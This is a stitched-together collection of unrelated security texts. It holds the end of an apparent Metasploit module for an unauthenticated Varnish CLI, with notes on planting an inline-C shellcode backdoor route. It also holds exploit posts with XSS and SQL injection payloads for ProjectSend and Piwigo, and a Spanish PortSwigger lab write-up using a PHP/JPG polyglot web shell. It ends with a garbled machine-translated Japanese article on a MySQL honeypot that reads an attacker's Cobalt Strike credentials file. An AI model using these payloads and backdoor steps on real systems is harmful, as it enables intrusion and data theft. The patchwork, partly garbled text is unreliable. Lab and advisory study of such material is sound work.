break else vprint_error("Unknown response:\n#{res}\n") end end } elsif (res =~ /Varnish Cache CLI 1.0/) print_good("Varnishd CLI does not require authentication!") else vprint_error("Unknown response:\n#{res}\n") end disconnect end end =begin aushack notes: - varnishd typically runs as root, forked as unpriv. - 'param.show' lists configurable options. - 'cli_timeout' is 60 seconds. param.set cli_timeout 99999 (?) if we want to inject payload into a client thread and avoid being killed. - 'user' is nobody. param.set user root (may have to stop/start the child to activate) - 'group' is nogroup. param.set group root (may have to stop/start the child to activate) - (unless varnishd is launched with -r user,group (read-only) implemented in v4, which may make priv esc fail). - vcc_unsafe_path is on. used to 'import ../../../../file' etc. - vcc_allow_inline_c is off. param.set vcc_allow_inline_c on to enable code execution. - code execution notes: * quotes must be escaped \" * \n is a newline * C{ }C denotes raw C code. * e.g. C{ unsigned char shellcode[] = \"\xcc\"; }C * #import <stdio.h> etc must be "newline", i.e. C{ \n#include <stdlib.h>\n dosomething(); }C (without 2x \n, include statement will not interpret correctly). * C{ asm(\"int3\"); }C can be used for inline assembly / shellcode. * varnishd has it's own 'vcl' syntax. can't seem to inject C randomly - must fit VCL logic. * example trigger for backdoor: VCL server: vcl.inline foo "vcl 4.0;\nbackend b { . host = \"127.0.0.1\"; } sub vcl_recv { if (req.url ~ \"^/backd00r\") { C{ asm(\"int3\"); }C } } \n" vcl.use foo start Attacker: telnet target 80 GET /backd00r HTTP/1.1 Host: 127.0.0.1 (... wait for child to execute debug trap INT3 / shellcode). CLI protocol notes from website: The CLI protocol used on the management/telnet interface is a strict request/response protocol, there are no unsolicited transmissions from the responding end. Requests are whitespace separated tokens terminated by a newline (NL) character. Tokens can be quoted with "..." and common backslash escape forms are accepted: (\n), (\r), (\t), ( ), (\"), (\%03o) and (\x%02x) The response consists of a header which can be read as fixed format or ASCII text: 1-3 %03d Response code 4 ' ' Space 5-12 %8d Length of body 13 \n NL character. Followed by the number of bytes announced by the header. The Responsecode is numeric shorthand for the nature of the reaction, with the following values currently defined in include/cli.h: enum cli_status_e { CLIS_SYNTAX = 100, CLIS_UNKNOWN = 101, CLIS_UNIMPL = 102, CLIS_TOOFEW = 104, CLIS_TOOMANY = 105, CLIS_PARAM = 106, CLIS_OK = 200, CLIS_CANT = 300, CLIS_COMMS = 400, CLIS_CLOSE = 500 }; =end

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= INDEPENDENT SECURITY RESEARCHER PENETRATION TESTING SECURITY -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= # Exploit Title: ProjectSend r561 - Cross Site Scripting & Full Path Disclosure Vulnerability's # Date: 19/12/2014 # Url Vendor: http://www.projectsend.org/ # Vendor Name: ProjectSend # Version: r561 Ultimate Version # CVE: CVE-2014-1155 # Author: TaurusOmar # Tiwtte: @TaurusOmar_ # Email: taurusomar13@gmail.com # Home: overhat.blogspot.com # Tested On: Bugtraq Optimus # Risk: Medium Description ProjectSend is a client-oriented file uploading utility. Clients are created and assigned a username and a password. Files can then be uploaded under each account with the ability to add a title and description to each.When a client logs in from any browser anywhere, the client will see a page that contains your company logo, and a sortable list of every file uploaded under the client's name, with description, time, date, etc.. It also works as a history of "sent" files, provides a differences between revisions, the time that it took between each revision, and so on. ------------------------ + CROSS SITE SCRIPTING + ------------------------ # Exploiting Description - Get into code xss in the box of image description. <textarea placeholder="Optionally, enter here a description for the file." name="file[1][description]">DESCRIPTION&lt;/textarea&gt; #P0c "><img src=x onerror=;;alert('XSS') /> <textarea placeholder="Optionally, enter here a description for the file." name="file[1][description]">CODE XSS&lt;/textarea&gt; #Proof Concept http://i.imgur.com/FOPIvd4.jpg ------------------------ + FULL PATH DISCLOSURE + ------------------------ # Exploiting Description - The url disclosure directory of platform. #P0c http://site.com/projectsend/templates/pinboxes/template.php #Proof Concept http://i.imgur.com/xfN4kDV.jpg

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= INDEPENDENT SECURITY RESEARCHER PENETRATION TESTING SECURITY -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= # Exploit Title: Piwigo 2.7.2 - SQL Injection / Cross Site Scripting Vulnerability's # Date: 19/12/2014 # Url Vendor: http://www.piwigo.org/ # Vendor Name: Piwigo # Version: 2.7.2 # CVE: CVE-2014-1470 # CVE References: CVE-2013-1468, CVE-2013-1469 # Author: TaurusOmar # Tiwtter: @TaurusOmar_ # Email: taurusomar13@gmail.com # Home: overhat.blogspot.com # Tested On: Bugtraq Optimus # Risk: High Description Piwigo is a photo gallery software for the web that comes with powerful features to publish and manage your collection of pictures. ------------------------ + CROSS SITE SCRIPTING + ------------------------ # Exploiting Description - Get into code xss in the box of group list. <fieldset> <legend>Add Group</legend><p> <strong>Name Group</strong><br> YOUR GROUP NAME O POC <input type="text" size="20" maxlength="50" name="groupname"></p> <p class="actionButtons"> <input type="submit" value="Add" name="submit_add" class="submit"> <a id="addGroupClose" href="#">Cancel</a></p> <input type="hidden" value="24322c55681c00da423a8a7b21b79640" name="pwg_token"> </fieldset> #P0c "><img src=x onerror=prompt(1);> #Proof Concept http://i.imgur.com/qFyJz6q.jpg ------------------------ + Sql Injection + ------------------------ # Exploiting Description - Sql Injection in control panel of admin and others users . #P0c http://site.com/piwigo/admin.php?page=history&search_id=5' SELECT date, time, user_id, IP, section, category_id, tag_ids, image_id, image_type FROM ucea_history WHERE ; in /home/site.com/public_html/piwigo/include/dblayer/functions_mysqli.inc.php on line 830 #Proof Concept http://i.imgur.com/wpzMmmu.jpg

En este post vamos a estar resolviendo el laboratorio de PortSwigger: “Remote code execution via polyglot web shell upload”. Para resolver el laboratorio tenemos que subir un archivo PHP que lea y nos muestre el contenido del archivo /home/carlos/secret. Ya que para demostrar que hemos completado el laboratorio, deberemos introducir el contenido de este archivo. Además, el servidor está configurado para verificar si el archivo es una imagen fijándose en el contenido del mismo. En este caso, el propio laboratorio nos proporciona una cuenta para iniciar sesión, por lo que vamos a hacerlo: Una vez hemos iniciado sesión, nos encontramos con el perfil de la cuenta: Como podemos ver, tenemos una opción para subir archivo, y concretamente parece ser que se trata de actualizar el avatar del perfil. Vamos a intentar aprovecharnos de esta opción para subir el siguiente archivo PHP: Ojo, si nos fijamos, en este caso, además del propio código PHP. Estoy definiendo un string al principio del archivo. Esto ocurre porque para determinar el tipo de contenido de un archivo, se usan los primeros bytes, lo que se conoce como “magic numbers”. Estos primeros bytes de los archivos determinan de que tipo es o como se trataran, aunque el contenido sea totalmente distinto. Como vemos, contiene un código PHP, pero el propio linux lo detecta como una imagen, esto ocurre por los magic numbers. En el siguiente enlace os dejo una lista de los magic numbers asociados a los diferentes tipos de archivos: https://gist.github.com/leommoore/f9e57ba2aa4bf197ebc5 Con esto entendido, configuramos el burp suite para que intercepte las peticiones: Una vez tenemos Burp Suite listo junto al proxy, seleccionamos el archivo y lo subimos: Burp suite interceptará la petición de la subida del archivo: Para tratar mejor con la petición, la vamos a pasar el repeater y al mismo tiempo le vamos a dar a enviar para analizar la respuesta: Parece que se ha subido sin problemas. Vamos a ver esta respuesta en el navegador: Una vez aquí, ya no nos hará mas falta el burp suite, por lo que vamos a desactivar el proxy: Con esto hecho, nos dirigimos a nuestro perfil: Ahora, si nos fijamos en el perfil, podemos ver como el avatar ha cambiado, y ahora muestra un fallo de que no carga bien la imagen: Esto seguramente es porque está intentando cargar nuestro archivo PHP como si fuera una imagen, y claro, falla al hacerlo. Para confirmar si se trata de nuestro archivo PHP, le damos click derecho para ir a la ruta exacta de “la imagen”: Como vemos efectivamente se trata de nuestro archivo PHP, y, además del string colocado para establecer los magic numbers, podemos ver el contenido del archivo secret. Dicho de otra forma, la salida del código PHP interpretado. Teniendo el contenido de secret, simplemente enviamos la respuesta: Y de esta forma, resolvemos el laboratorio: Además de la solución que hemos llevado a cabo, PortSwigger sugiere otra bastante curiosa y que vale la pena comentar: Creamos un archivo exploit.php el cual lea el contenido del archivo secret de Carlos, por ejemplo: <?php echo file_get_contents('/home/carlos/secret'); ?>Nos logueamos e intentamos subir nuestro archivo PHP en la parte de nuestro avatar. Como veremos, el servidor bloquea cualquier subida de archivo que no se trate de una imagen.Vamos a crear un archivo polyglot PHP/JPG. Es decir, un archivo que sea una imagen pero contenga código PHP en sus metadatos. Para ello, es tan sencillo como usar cualquier imagen y agregarle unos metadatos personalizados usando exiftool. Ejemplo: exiftool -Comment="<?php echo 'START ' . file_get_contents('/home/carlos/secret') . ' END'; ?>" <YOUR-INPUT-IMAGE>.jpg -o polyglot.php . Esto añadirá el payload PHP al campo de comentario de los metadatos. Con esto, guardaremos la imagen con extensión .php.Ahora, subimos este archivo, veremos que no tendremos ningún problema. Con esto hecho, volvemos a nuestro perfil.Si nos vamos al HTTP History del burp suite, podremos ver una petición GET a la supuesta imagen del avatar (esta petición se ha producido cuando hemos accedido a nuestro perfil y el avatar ha intentado cargar). Si cogemos esta petición y miramos su respuesta, podremos ver el contenido del archivo secret de Carlos.Enviamos la solución y habremos resuelto el laboratorio.

MySQLハニーポットの特定の技術的詳細については、インターネット上にあまりにも多くの記事があります。自分でオンラインで記事を検索できます。紹介を書きます：MySQLには、MySQLデータベースにローカルファイルを読み取ることができるロードデータローカルインフィル機能があります。攻撃者がMySQLパスワードを爆発させてMySQLにスキャンして接続するスキャナーを使用しています（ここで修正します。MySQLハニーポットに接続するだけで、ハニーポットでローカル構成ファイルを読み取ることができます。正しいユーザー名とパスワードを提供する必要はありません）、クライアント（攻撃者）応答パケットにローカルインフィルのロードデータを追加して、攻撃者のローカルファイルをデータベースに読み取り、対策の目的を達成します。 （次の写真はインターネット検索からのものです） CSの構成ファイルプレーンテキストストレージパスワード CSSクライアントを使用してCSSサーバーを使用したコンピューターに接続する限り、CSSクライアントは固定フォルダーで.aggressor.prop構成ファイルを生成します。 Windowsシステムの場合、ファイルの場所はc: \ uses \ administrator \ .aggressor.propです。この構成ファイルには、CSSリモートコントロールのIPアドレス、ポート、ユーザー名、パスワードが含まれており、すべてプレーンテキストにあります！下の図に示すように： CSを開くたびに、ログインしたIPアドレス、ポート、ユーザー名、パスワード、その他の情報が表示されます。これらの情報は、local .aggressor.propファイルに保存されます。一般的なコンテンツを以下の図に示します。 したがって、MySQLハニーポットを構築したという結論に達しました。攻撃者がハニーポットに接続すると、HoneypotはMSYQLローカルファイルの読み取り脆弱性を使用して、C: \ uses \ administrator \ .aggressor.propファイルのコンテンツを自動的に読み取ります。 Honeypotは、攻撃者のCCSサーバーIPアドレス、ポート、ユーザー名、パスワードを正常に取得できます。 環境実験を正常に構築しました 上記の推測を検証するために、実際にテストする必要があります。 githubからpythonで書かれたmysqlハニーポットスクリプトを見つけて、単にローカルに変更するだけで、ファイル読み取りのパスをC: \ uses \ administrator \ .aggressor.propに変更し、スクリプトを実行します。以下の図に示すように、ローカルポート3306を聴くMySQLハニーポットが構築されています。 MySQLに接続する赤チーム担当者の動作をシミュレートするために、NAVICATを使用して、このハニーポットのIPアドレスをリモートで接続します。 （もう一度強調するために、MySQLのユーザー名とパスワードを知る必要はありません。間違ったユーザー名とパスワードを入力します。MySQLHoneypotもローカルファイルを読むことができます） 下の図に示すように、MySQLハニーポットは、現在のディレクトリのログファイルにBase64暗号化されたCS構成ファイルのコンテンツを提供します。 Base64が復号化された後の結果は次のとおりです。 ・ 取得したIPアドレス、ポート、ユーザー名、およびパスワードはCSSサーバーに接続されていました（次の写真はインターネットからのものです） Windowsの下では、WeChatのデフォルトの構成ファイルはc: \ uses \ username \ documents \ wechatファイルに配置されます。それを調べると、c: \ uses \ username \ documents \ wechat files \ alues \ config \ config.dataが含まれていることがわかります。